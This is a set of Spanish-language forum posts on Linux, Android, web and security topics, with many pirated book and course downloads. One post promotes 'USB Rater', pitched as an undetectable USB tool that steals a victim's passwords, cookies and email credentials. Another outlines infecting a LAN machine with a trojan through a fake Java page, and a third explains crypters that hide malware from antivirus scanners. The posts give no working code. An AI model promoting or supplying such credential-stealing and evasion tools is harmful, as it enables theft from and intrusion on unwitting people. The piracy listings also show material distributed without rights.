Capitulo 12: Firewalls y proxies
Instalacion. El comando iptables.
Capitulo 13: El sistema VNC
Instalacion, caracteristicas y funcionamiento.
Capitulo 14: Clusters Beowulf
Clusters en GNU/Linux. Instalacion de Mosix.

  Características de la descarga: Formato: Pdf
Compresión: .rar
Peso: 96.6 MB
Idioma: Español

Descarga con No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Código:
Código: php
http://ul.to/a8w8jime
Descarga con Depositfiles:
  Código:
Código: php
http://depositfiles.com/files/514x3z5q9
#102
GNU/Linux / 202 Secretos de linux [USERS]
Agosto 07, 2012, 06:31:33 PM



Destinado tanto a principiantes como a  usuarios  expertos, este libro  ofrece todas las claves y secretos  necesarios para  dominar al máximo las  diferentes distribuciones de  Linux. Cómo  optimizar el sistema y  volverlo más seguro, aumentar el  rendimiento del  equipo, habilitar  funciones especiales y automatizar  tareas  cotidianas, son sólo algunos  de los objetivos que lograremos  con los  más de 200 secretos revelados. Características de la descarga: Formato: Pdf
Compresión: .rar
Peso: 204 MB
Idioma: Español  Descarga con Depositfiles


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#103
Android / Curso Android [118 Videotutoriales]
Agosto 07, 2012, 06:28:21 PM


Hoy en día, tanto en entornos empresariales como a nivel personal, es fundamental estar "conectado", teniendo a nuestro alcance todas las posibilidades que nos ofrece la red (redes sociales, correo electrónico, chat, mensajería,...). Estas necesidades deben ser cubiertas y Android es la plataforma líder del mercado. Por ello, el grado de demanda de programadores especializados en desarrollo de aplicaciones para terminales Android crece cada día más.

Con este curso aprenderás a manejar el entorno de desarrollo Eclipse para diseñar aplicaciones Android, usando adecuadamente las APIs de Google, comprendiendo el funcionamiento y utilizando todos los sensores del terminal, usándolos como fuente de datos para tus aplicaciones. Una vez finalizado el curso, serás capaz de desarrollar aplicaciones para móviles y adquirirás los conocimientos necesarios para profundizar en el desarrollo de aplicaciones más avanzadas. También tendrás la posibilidad de comercializar tus aplicaciones en el Market, el almacén de aplicaciones para dispositivos móviles Android.
------------------------------
Idioma: Español
Servidor: Freakshare
Archivo: .RAR
Videos: .mp4
Peso: 1.40GB
Total de links: 3
Videos: 118
------------------------------
Descargar
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#104

El turista es un ser vulnerable. Lejos de la seguridad de su casa, aquel que viaja es presa ideal para todo tipo de criminales.


El portátil de un viajero también es vulnerable, y esto los cibercriminales lo saben muy bien. Su malware, apostado en las esquinas de las redes informáticas más usadas por los turistas, aprovecha cualquier ocasión para infectar y robar datos.


Para que tu PC y tú paséis unas vacaciones tranquilas, te explicamos cuáles son los riesgos informáticos más habituales al viajar con el ordenador a cuestas y cómo evitar la mayoría de peligros, ya sean virus o robos.


Los escenarios más peligrosos al viajar


Allá donde es más probable que un turista se conecte, más posibilidades hay de que haya virus y hackers al acecho. El tipo de amenaza varía según el lugar en el que acontece la agresión informática.


Cibercafés


Los Internet Cafés son los sitios más habituales de contagio. La escasa supervisión de los equipos y la ausencia de medidas de seguridad básicas hace que muchos cibercafés sean auténticos nidos de virus. Conectar el pendrive en un cibercafé equivale a llenarlo al instante de malware que más tarde se propagará al portátil.


Bibliotecas



Las redes académicas y bibliotecarias son supuestamente más seguras, pero solo en teoría. La gran cantidad de equipos y la falta de control hace que las infecciones sean casi tan frecuentes como en los cibercafés, especialmente cuando los PC son de libre acceso. Muchas infecciones entran por memorias USB.


Redes WiFi públicas


Hay dos tipos de redes WiFi públicas: las legales y las falsas. Para las primeras los peligros son reducidos, pero las segundas, difíciles de distinguir de las legítimas, son trampas mortales. Si una WiFi no solicita primero una confirmación de acceso, desconecta a toda velocidad.


Hoteles


Los hoteles, con sus redes cerradas y aisladas, parecían estar a salvo, pero el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta recientemente de casos en los que las redes inalámbricas de los hoteles habían sido usadas para sustraer datos confidenciales. Como cualquier otra red compartida, la de un hotel también puede ser un blanco idóneo para ciberataques.


Tiendas de informática


Llevar el portátil a reparar, en algunos países, expone el PC a multitud de peligros, especialmente cuando se instalan programas pirateados y "enriquecidos" con troyanos (queriendo o sin querer). A menos que tengas un motivo importante para tener el portátil funcionando lejos de casa, evita llevarlo a repararlo para no tener sorpresas de última hora.


Las vías de contagio y los peligros más habituales





Los No tienes permitido ver los links. Registrarse o Entrar a mi cuenta no son la única amenaza para el ciberturista. En el momento en que tu portátil se conecta a una red compartida, este se expone por completo a todo tipo de ataques.


  • Troyanos: aunque la red no tenga acceso directo a Internet, puede tener nodos infectados a partir de los cuales los troyanos intenten autopropagarse
  • Phishing: si el cibercriminal de turno ha conseguido acceso a la infraestructura de red, puede redigir el tráfico de los demás clientes hacia página de robo de datos
  • Sniffing: la forma más básica de cibercrimen es la escucha. No conlleva ninguna intrusión, sino únicamente la recogida de los datos que transitan sin cifrado por la red local
  • Pendrives: las memorias USB y las tarjetas de memoria son extraordinariamente vulnerables ante infecciones de malware. Al menos los disquetes podían protegerse contra escritura...
  • Software pirata: en muchos países la cantidad de software original es prácticamente nula. Esto no supondría un problema si no fuese por la cantidad de malware que acompaña las versiones piratas de esos programas tan baratos
  • Acceso físico: por potente que sea tu cortafuegos, cuando tu PC cae en manos malintencionadas poco puede hacer para defenderse. No todos los ladrones formatean los discos: algunos buscan datos personales

"Vacunarse" antes de viajar: contramedidas y consejos básicos


Antes de viajar, las medidas de seguridad deben reforzarse. Al mismo tiempo, es necesario extremar la precaución siempre que el PC se conecte a una nueva red. En general, estas son las recomendaciones que todo turista debería seguir:


Imprescindible

  • Escanear SIEMPRE tarjetas y pendrives que han pasado por otro PC
  • No tienes permitido ver los links. Registrarse o Entrar a mi cuenta actualizado a la última versión (mejor si tiene anti-rootkit)
  • Tener un No tienes permitido ver los links. Registrarse o Entrar a mi cuenta activado para bloquear intrusiones y troyanos
  • Usar siempre protocolos seguros y cifrados en todas las páginas (No tienes permitido ver los links. Registrarse o Entrar a mi cuenta)

Recomendable

Opcional

Fuente: softonic
#105
Android / Cómo usar WhatsApp en Windows
Julio 29, 2012, 05:43:11 AM
Con WhatsApp en su mano, hay quien no necesita nada más para chatear: ni No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, ni No tienes permitido ver los links. Registrarse o Entrar a mi cuenta: en el móvil ya tienes todo lo que necesitas.


Esto provoca situaciones cuanto menos curiosas, como por ejemplo estar navegando por Internet en tu PC y tener que utilizar las teclas (o la pantalla táctil) de tu móvil para chatear con tus amigos.


¿Hay un modo de utilizar WhatsApp en Windows con tu teclado y ratón? Pues la verdad es que sí... más o menos.




¿Qué necesitas

1. Instala YouWave





La instalación de este emulador de Android es muy sencilla, simplemente sigue el asistente paso a paso.


Recuerda que es incompatible con VirtualBox. Deberás desinstalarlo -y reiniciar- antes de instalar YouWave para que funcione. Además, YouWave no se lleva bien en general con ningún tipo de emulación o redes virtuales, por lo que es recomendable que desactives redes VPN o similares cuando lo uses.


2. Inicia No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Lo primero que verás al cargar YouWave por primera vez es la ventana de registro.





La primera opción te permite probar el programa gratuitamente durante el período de prueba, mientras que la siguiente es para comprar una clave, y la última para introducirla.


Después verás la pantalla de inicio de YouWave. Como ves, no hay gran cosa ya que no tiene apps instaladas.





3. Instala WhatsApp en YouWave


Hay varios modos de instalar WhatsApp en tu Android emulado, pero quizá la forma más fácil sea usando el propio navegador.


Haz clic en su icono (la bola del mundo) e introduce la dirección No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Una vez cargue la web, descarga la aplicación haciendo clic en Download Now.





Una vez se haya descargado el archivo, haz clic en él para iniciar la instalación. Nota: las descargas se ocultan en la barra superior: arrástrala hacia abajo para ampliarla.





Acepta la instalación presionando Install y, si todo va bien, estará listo en unos segundos. Es un buen momento para cruzar los dedos, puesto que WhatsApp y dispositivos virtuales no se llevan demasiado bien, por lo que a veces no se instalará sin dar motivo alguno.


4. Verifica tu teléfono


Si todo ha ido bien, y esperamos que haya sido así, podrás iniciar WhatsApp desde la lista de aplicaciones de tu teléfono virtual.


Aquí debes tener en cuenta que no puedes usar WhatsApp de forma simultánea con una misma cuenta (número de teléfono) en dos dispositivos distintos. Por tanto, deberás elegir entre:

Sea cual sea tu elección, rellena los datos -no te olvides del No tienes permitido ver los links. Registrarse o Entrar a mi cuenta- y presiona verificar.





Claro está que WhatsApp será incapaz de verificarse con este proceso, ya que no tiene la capacidad de enviar ni recibir SMS. Aun así, lo intentará durante cinco largos minutos. Espera pacientemente. Pasados los cinco minutos, se rendirá y te dará la opción de verificar el número mediante una llamada.





Presiona Call me y recibirás una llamada en ese número de teléfono (si es un número virtual, lo más seguro es que sea un mensaje en el contestador). La voz simplemente repetirá un código de tres dígitos sin parar.


Mensaje de voz en FonYou con la clave


Escríbelo en el recuadro para verificar tu número. Después introduce un nombre, y listo.


5. Añade tus contactos


Tu Android personalizado no tiene contactos y, por tanto, tampoco los tiene WhatsApp. Aquí puedes optar por añadirlos uno a uno o importarlos desde un formato compatible como vCF.


Por ejemplo, en Gmail se hace desde Contactos &gt; Más &gt; Exportar y luego eligiendo vCard.





¿Pero cómo pasar este archivo a tu Android? Puedes hacerlo de muchas formas: por ejemplo, enviándotelo a ti mismo, adjunto en un e-mail y abriendo tu correo desde el navegador.





Al abrir el adjunto los contactos se importarán en tu "teléfono".


6. ¡A Chatear!



[/url]


Cómo usar WhatsApp en Windows sin YouWave


Se podría decir que YouWave es una especie de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta empaquetado con una imagen de Android de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y, puesto que ambos componentes son gratuitos, ¿por qué pagar por ello? Y eso sin contar con el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, gratuito, que también sirve de emulador.


La respuesta es el tiempo. YouWave funciona tal cual, mientras que hacer WhatsApp funcionar en Android SDK, o arrancar un Android-x86 requiere de mucha más paciencia y conocimientos. Nosotros te damos las claves.


Antes de instalar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta necesitas descargar e instalar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Después, la primera vez que lo arranques, verás el SDK manager, un repositorio de paquetes listos para ser instalados. Elige la versión de Android que quieres probar (por ejemplo: 2.3.3, 3.0...), expande su árbol y marca SDK Platform. Después presiona Install x packages y se iniciará la descarga e instalación de forma automática.





Cuando todo se haya instalado, usa el menú Tools &gt; Manage AVDs y presiona New. En la ventana que se abre, escoge un nombre cualquiera para tu teléfono, una versión de Android y especifica un tamaño máximo para la tarjeta SD.


Tras presionar Create AVD ya tienes tu teléfono de pruebas listo para arrancar con Start.


WhatsApp funcionando en Android SDK


El principal problema de Android SDK es la lentitud con la que funciona, además de lo difícil que es hacer que WhatsApp se instale satisfactoriamente. El primer problema debería solventarse con las builds optimizadas para x86 de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, pero hacer funcionar una imagen en VirtualBox es No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#106
Hoy les traigo un pequeño script muy básico para mantener actualizado los Exploits que se encuentran en /pentest/exploits/exploitdb en Bactrack, pero la mayor utilidad que hay por detrás de este Script es poder usar searchsploit (que se encuentra en /pentest/exploits/exploitdb también) para encontrar los exploits que necesitemos en nuestras auditorías.



Para ésto creamos nuestro script con el nombre que deseemos, yo lo llamé No tienes permitido ver los links. Registrarse o Entrar a mi cuenta:
Código: php
[code]#!/bin/bash
# http://www.blackploit.com/
cd /pentest/exploits/exploitdb
wget http://www.exploit-db.com/archive.tar.bz2
tar -xvvf archive.tar.bz2
rm -R archive.tar.bz2


Le damos privilegios al script y lo ejecutamos:
Código: php
[code]chmod a+x update.sh
./update.sh



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Ahora tenemos actualizados los últimos exploits de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, pero lo interesante es usar searchsploit como dije antes que se encuentra en  /pentest/exploits/exploitdb el cual nos sirve para encontrar exploits según nuestras necesidades, y éste nos entrega una descripción y la ruta donde encontrar el exploit:


 

Aquí por ejemplo busqué "Apache" y me da todos los exploits de Apache con sus respectivas descripciones y rutas. 
 
 


Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#107
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta ha sacado una nueva versión de su scanner para Joomla, en el cual se le han agregado nuevos bugs del núcleo de Joomla y otros más.


La herramienta está hecha en Perl y lo que hace es buscar determinados ficheros para encontrar la versión de Joomla y posibles bugs en las respectivas versiones.


Tengo que admitir que cuando hago una auditoria a Joomla este es una de mis herramientas favoritas y por eso mismo la posteo.

Sin más que decir dejo el link de descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#108
Hacking / Diccionarios de contraseñas
Julio 04, 2012, 03:01:30 PM
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Los ataques de fuerza bruta, ya sea para creackear una red Wi-Fi como así también para descifrar una contraseña están muchas veces delimitado por el diccionario que estamos usando para esa actividad.

Por otro lado tenemos las contraseñas por defecto que vienen incorporado en algún software y que por lo general el usuario nunca las modifica, para una auditoría de algún dispositivo no está mal comenzar a probar con esas contraseñas.

La realidad es que hoy podemos encontrar de forma gratuita listados de palabras y combinaciones de las diferentes contraseñas que un usuario podría utilizar, es por ello que la idea de hoy es compartir algunos enlaces con buenos diccionarios, ya sea en español o inglés para poder utilizarlos.
[/url]
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Listado de Contraseñas por defecto

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Generador de Listado de Palabras

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#109
Uniscan es un escáner de vulnerabilidades Web, dirigido a la seguridad informática, cuyo objetivo es la búsqueda de vulnerabilidades en los sistemas web. Está licenciado bajo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.



Uniscan está desarrollado en Perl, tiene un fácil manejo de expresiones regulares y también es multi-threaded.



Lo estuve testeando, y los resultados que me entrega me han sido muy útiles. Además tiene la opción de agregarle No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y también se pueden No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.
[/url]
Aquí dejo un vídeo demostrativo:





Requiere los siguiente módulos en Perl:

  • Moose
  • threads
  • threads::shared
  • Thread::Queue
  • HTTP::Response
  • HTTP::Request
  • LWP::UserAgent
  • Net::SSLeay
  • Getopt::Std
Instalación de los Módulos Perl:
Código: php
[code]# cpan -i Moose
# cpan -i threads
# cpan -i threads::shared
# cpan -i Thread::Queue
# cpan -i HTTP::Response
# cpan -i HTTP::Request
# cpan -i LWP::UserAgent
# cpan -i Net::SSLeay
# cpan -i Getopt::Std
[/code]

Opciones de Uniscan:
        -h      help
        -u      <url> example: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
        -f      <file> list of url's
        -b      Uniscan go to background
        -q      Enable Directory checks
        -w      Enable File checks
        -e      Enable robots.txt check
        -d      Enable Dynamic checks
        -s      Enable Static checks
        -r      Enable Stress checks
        -i      <dork> Bing search
        -o      <dork> Google search]

Un Ejemplo de escaneo simple sería:
Código: php
[code]Example: perl uniscan.pl -u http://www.example.com/ -d
[/code]

Para mayor información pueden visitar la No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#110
Hacking / USB Rater Hack (Pendrive USB roba datos)
Junio 27, 2012, 11:19:09 AM


Roba todos los datos con solo conectarla. 100% indectectable y funciona a la perfeccion!!

USB Rater es una pequeña y curiosa aplicaciòn que te permite obtener casi cualquier tipo de contraseñas de PC. Este programa realmente hace lo que promete roba toda clase de contraseñas e información confidencial de la PC con solo insertes tu USB, lo que te puede ayudar a conseguir este programa es:

• Toda clase de contraseñas del navegador web hi-5, myspace, e incluso de foros.
• Historial de navegación completo (para darte cuenta del perfil de la víctima y o amiga)
• Cookies esto sabrán mis amigos más experimentados para lo que sirve.
• Los clientes de correo tales como msn, yahoo, gmail y demás.
• Toda la información de su hardware e IPs
• Los puertos abiertos recientemente.
• Licencias de los programas que tiene


Peso: 5,2 MB


Mirror: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#111





  • Contraseña Archivo Winrar: vampirgotk
  • Contraseña Para Accesos: 2UNJUB245
  • Contraseña Para Extracciones: 5364256


    El Programa Ya Contiene Videotutoriales Para Saber Como Se Usa



    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
    No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#112
Los compresores para CSS son muy útiles a la hora de aumentar la velocidad de carga de nuestro sitio web, ya que comprimirá nuestro código muy rápidamente y todo sin alterar su legibilidad.

Es por esto que a continuación les recomiendo 5 útiles compresores en línea para CSS gratis, los mejores y los más eficaces en la actualidad, para mi gusto.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#113
GNU/Linux / Manual practico Iptables, firewall Linux
Junio 25, 2012, 02:15:58 PM
En este manual se muestran las habituales arquitecturas de redes con firewall y la forma de montar iptables para cada caso, con distintas opciones para cada ejemplo.

1. Qué es un firewall
2. Qué es iptables
3. Al grano: creando un firewall con iptables
   3.1 Proteger la propia máquina
   3.2 Firewall de una LAN con salida a internet
   3.3 Firewall de una LAN con salida a internet con DMZ
   3.4 Firewall de una LAN con salida a internet y VPNS
   3.5 Firewall puro y duro entre redes
   3.6 Firewall con política por defecto DROP
4. Cómo depurar el funcionamiento del firewall

Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Descarga:No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#114


Esta es una demostracion de como se puede conseguir infectar con un troyano a una PC que este en tu misma LAN y asi conseguir el control total sobre un PC.
Para esta demostracion se ha utilizado un PC atacante con win7 [192.168.1.34] y otro victima con winVista [192.168.1.37]

Se crea un servidor con tu pagina de java facke y se redirecciona a tu victima para que cuando quiera conectarse a una pagina [en este caso google] se le envie tu facke y se infecte.
#115
La dirección IP, que significa y cuáles son sus usos. Tipos de direcciones IP. Como conocer la que tenemos asignada a nuestra conexión de red. Como cambiarla, saber si es posible ocultarla.





La dirección IP es uno de los términos más empleados en el vocabulario técnico, al hacer referencias a las características de cualquier red. No obstante, no es nada difícil conocer y comprender en que consiste y sus características más comunes.
El objetivo de esta página es solo facilitarle al usuario común conocer los principios elementales necesarios en la práctica.
¿Qué es la dirección IP?


La Dirección IP es un número de identificación utilizado en todas las conexiones de red, ya sea inalámbrica, de cable local o en internet, para clasificar, diferenciar y autentificar los nodos o puntos desde los cuales nos conectamos e intercambiamos información.
La dirección IP asignada a un equipo permite que este tenga una identidad única, para la cual se utiliza un formato numérico.
En el protocolo IPv4 que es el más utilizado actualmente, la dirección IP se representa con cuatro grupos de números decimales, usando el formato: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.
Un ejemplo es: 164.12.123.65, el valor de cada grupo puede estar entre 0 y 255.
Como se comprenderá las combinaciones posibles son muchas pero limitadas y llegará el momento que no alcancen para satisfacer la demanda, es por eso que está en desarrollo otro protocolo llamado IPv6, que suplirá dichas limitaciones.
Existen dos grandes grupos de direcciones IP, las fijas o estáticas y las dinámicas.
Direcciones IP estáticas o fijas


La dirección IP estática es una combinación numérica única y se asigna a sitios de Internet que por su función necesitan estar conectados permanentemente a la red. Los servidores de correo, DNS, FTP públicos, y grandes servidores de páginas web necesariamente deben contar con una dirección IP fija o estática, ya que de esta forma se permite su localización de forma permanente.
Direcciones IP dinámicas


Para el otro grupo de equipos conectados a la red la dirección IP no es fija, se asigna una dirección diferente cada vez que se establece una conexión, es la llamada dirección IP dinámica o DHCP.
¿Por qué funciona así?
Generalmente los ISP, o proveedores de acceso a internet, que son las empresas dedicadas a ofrecer el servicio de internet a la población y entidades, cuentan con un número limitado de direcciones IP, es decir siempre el número de usuarios supera las conexiones disponibles, en algunas ocasiones en proporción hasta de 50 o 100 por 1. Pero lógicamente que todos los usuarios no se conectan al mismo tiempo, lo que permite que los ISP vayan ofreciendo las conexiones disponibles de forma alterna.
Esta es la gran ventaja de las direcciones IP, lógicamente que siempre hay posibilidades de disponer de una dirección IP única al solicitar un servicio a cualquier proveedor, es lo que se conoce como direcciones IP dedicadas, lógicamente el precio es prohibitivo para el usuario común, por lo que tenemos que conformarnos con una dirección IP dinámica, cuyo precio siempre es varias veces menor.


No se debemos confundirnos con el tipo de dirección que utilizamos, en algunos casos esta se realiza a través de un Router, este no es más que un intermediario entre nuestro equipo y el ISP, por lo que podrá tener una dirección IP dinámica, pero entregarnos una de rango fijo que en este caso será una dirección IP local.
Ejemplos de direcciones IP de internet


• La siguiente dirección IP es estática: 72.14.204.104 corresponde a uno de los servidores de No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, si introduces dicho número en la barra de dirección de tu navegador, automáticamente te dirigirá a dicho sitio web. Como se comprenderá Google utiliza varias direcciones IP.


• La siguiente dirección IP es dinámica: 200.55.157.124. Esta es una de las que me asigna mi ISP, el último grupo puede oscilar entre el 25 al 128, de acuerdo a la disponibilidad.
Al establecer una conexión, aun cuando nuestra dirección sea dinámica, siempre el ISP tratará de entregar la misma si fuera posible.
¿Y cómo el ISP sabe las que ya me ha asignado?
Fácil, nos identifica por la MAC Address de nuestra tarjeta o adaptador de red, que es un número de identidad de la misma.


• La siguiente dirección IP es de una red local: 192.168.0.3. En las redes de área local, ya sean por cable o inalámbricas, que son las que no hay comunicación con el exterior, por ejemplo: empresas, escuelas se asigna un número que tiene el formato No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.


• Por ultimo la siguiente dirección IP es la interna de tu PC, conocida como&nbsp;localhost&nbsp;o dirección de loopback, en todos los equipos es la misma: 127.0.0.1.
1- Conocer la dirección IP usando el comando IPCONFIG
• Abre la consola de CMD, para eso escribe en el cuadro de Inicio o en Ejecutar: CMD y oprime la tecla Enter.
• En la ventana de la consola escribe: IPCONFIG /ALL, oprime de nuevo Enter.
Se mostrarán varios datos de tu conexión de red, entre ellos:


-tu Nombre de Host
-tu Dirección IPv4
-tu Servidor DNS
- la Dirección IP de tu red local


Si usas una red local, es fácil de reconocer porque siempre tiene el formato: 192.168.x.x.


Un ejemplo de la información anterior puedes verla en la siguiente imagen:



¿Se puede cambiar la dirección IP?


En el caso de que nuestro equipo se encuentre en una red local, podemos decidir perfectamente que tipo de dirección IP utilizar, ya sea dinámica o estática, en una dirección IP estática o fija podemos establecer exactamente la que nos interese, siempre que se encuentre dentro del rango correspondiente.
En los casos de una conexión externa, o sea directa a internet es imposible cambiar la dirección IP, eso depende de nuestro proveedor de acceso.
¿Se puede ocultar la dirección IP?


La dirección IP asignada a nuestra conexión siempre es enviada en los headers o encabezados HTTP al realizar cualquier solicitud con el navegador web, por lo que es imposible de ocultar. No creas en ningún software que lo prometa.
Existe otro método ampliamente utilizado en internet, que de forma relativa permite ocultar la dirección IP, es navegar a través de un web proxy. Estos son servidores que ofrecen el servicio de permitir la navegación web a través de ellos, es decir haces la solicitud a unos de estos proxys de una dirección URL y el proxy hace la solicitud a dicho sitio, posteriormente te conectan, por lo que dicho sitio identificará la conexión proveniente con la dirección IP del proxy, no la tuya, es lo que se conoce como navegación anónima.
Otros métodos para conocer una dirección IP


Si lo que necesitas es conocer la dirección IP de un sitio, una página web o un dominio determinado, lo puedes lograr de forma sencilla usando el comando PING en la consola de CMD.


• Para eso abre la consola de CMD.
• Escribe PING y a continuación el nombre de dominio.
El nombre de dominio es la dirección URL quitándole el protocolo HTTP://
Por ejemplo el nombre de dominio de la dirección web "No tienes permitido ver los links. Registrarse o Entrar a mi cuenta" es: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, por lo que sería necesario introducir en la consola: PING No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y devolverá la dirección IP que le corresponde.
#116
Curiosamente, los usuarios que buscan personalizar su escritorio No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, la gran mayoría, quieren que se parezca a la antigua versión de este entorno, sobre todo su menú global, las notificaciones en la barra o la propia "barra de abajo".


Por supuesto, siempre podemos quedarnos con la versión clásica de este escritorio, pero también podemos aprovechar todo su potencial utilizando diferentes No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. Algunas de ellas pueden ayudarnos a acercar e incluso mejorar su usabilidad, como es el caso de Panel Docklet.


Docklet, es eso, un No tienes permitido ver los links. Registrarse o Entrar a mi cuenta que dentro de su simpleza, es altamente configurable, pudiéndose situar en casi cualquier sitio de nuestro escritorio, incluso, un poquito más a la derecha...


Este mini-dock, no tiene nada que envidiar a lanzadores de otro tipo si lo que buscamos es sencillez y tiene un menú tan completo, que seguro que te sorprende.


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Si te parece que tiene buena pinta, diviértete configurándolo.


Descárgalo desde No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#117





Creación de sitios web



Adobe Dreamweaver CS6 [/b]es la herramienta más potente, cómoda y fácil de utilizar para crear contenidos web que existe hoy en día. Tanto si eres un novato en la materia como si eres un desarrollador experimentado, si maquetas HTML o si programas con gestores de contenidos, Dreamweaver tiene herramientas para ti y este curso video2brain es ideal para conocer los fundamentos de su uso.

"Jorge González Villanueva te presenta su curso Curso fundamental de Dreamweaver CS6. Creación de sitios web".


Dreamweaver es mucho más que un editor de código; está pensado para ser la herramienta ideal para todos los perfiles de trabajo relacionados con la creación de contenidos para la web y permite, desde crear sitios web de manera visual y sin tener que tocar el código, hasta desarrollar complejas RIAs con todo tipo de ayudas a la programación.


A lo largo de este curso iremos enseñando las herramientas de Dreamweaver avanzando partiendo de las tareas más simples, como la creación de documentos, o cómo configurar un sitio web hacia tareas más específicas, como la maquetación con CSS o la creación de formularios hasta completar todos los procesos habituales en la creación de sitios web. Además se irán explicando los conceptos necesarios de los lenguajes que vayamos utilizando para que no importe los conocimientos previos en la materia. Y acabaremos descubriendo algunas de las posibilidades que ofrece el programa para crear aplicaciones de servidor (PHP).


El objetivo de este curso video2brain es conseguir que seas capaz de empezar a utilizar las fantásticas herramientas que Dreamweaver ofrece para la creación de sitios web, la generación de contenidos, la maquetación de HTML y el uso de CSS, la creación de contenidos interactivos y la animación simple con CSS, la programación con lenguajes de servidor y el control sobre la calidad de nuestros sitios, y todo ello basado en pequeños ejemplos prácticos de uso.
¡Disfruta de Dreamweaver CS6 y su integración con las herramientas de desarrollo de Adobe!






No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta








No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta





No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#118
Poco a poco voy a ir soltando y desplegando conocimientos para que todo el mundo pueda optar a entender un poco más lo que utiliza y lo que programa.

¿Qué es un crypter?
Pese a que podré ser colgado por un experto, podríamos definir sin equivocarnos que un crypter será la herramienta que nos transforme un fichero A en un fichero B, realizando cambios (muchos o pocos), sobre el fichero original A, y añadiendole o no alguna funcion que antes no tenia.

¿Para que nos sirve un crypter?

-Habitualmente se utiliza para evitar la decompilación del código, al menos tratar de complicarlo.
-Saltar la heuristica de los antivirus.
-Simplemente camuflar un fichero bajo la apariencia de otro (normalmente, haciendo creer que es inofensivo)

¿Hay tipos de crypter?
Existen 2, pese a que podriamos catalogarlos en más.
-Runtime pueden llegar a ser ejecutados, sin que sean detectados por un anti virus por ejemplo.
-Scantime no son ejecutados, simplemente cuando un antivirus scanea en busca de firmas, heuristica, etc, no detectará nada extraño sobre este fichero.

¿Como funciona un crypter?
Lo normal es que existan 2 ficheros, el primero se encangará de realizar el pastel, es decir, mezclar, batir y aliñar nuestro programa. El segundo, será un lanzador o stub, se encargará de situar el código de nuestro programa en memoria.

¿Puedes ser más técnico?
Aquí es la zona que a mi me gusta, y en la que creo despistaré a unos cuantos.
Previo a entrar en materia supongamos que tenemos un fichero virusmortal.exe, el código de mi virusmoral, será: linea que hace todo el mal.

Un crypter, leera el código de mi programa, en este caso situará en una variable: "linea que hace todo el mal", suponemos que los antivirus detectan por firma la palabra "mal". nota; tristemente el funcionamiento de los antivirus es bastante parecido a esto.

Si guardamos el contenido de la variable, de nuevo en un fichero nuestro antivirus (de ahora en adelante AV), saltará y nos avisará. Por lo tanto algo tiene que hacer el crypter, dependiendo del programador, aplicará una tecnica, ya sea dar la vuelta a la cadena, o encriptarla con xor, con base64, por comodidad yo utilizaré base64.

El programa pasará la cadena que tenia en la variable, por una funcion que me codificará el el texto almacenado, en base64, nos quedaría: "bGluZWEgcXVlIGhhY2UgdG9kbyBlbCBtYWw=". Si guardamos esto de nuevo en virusmortal.exe, NO funcionará, ha perdido el poder de ser ejecutado. Tendriamos un fichero en scantime.

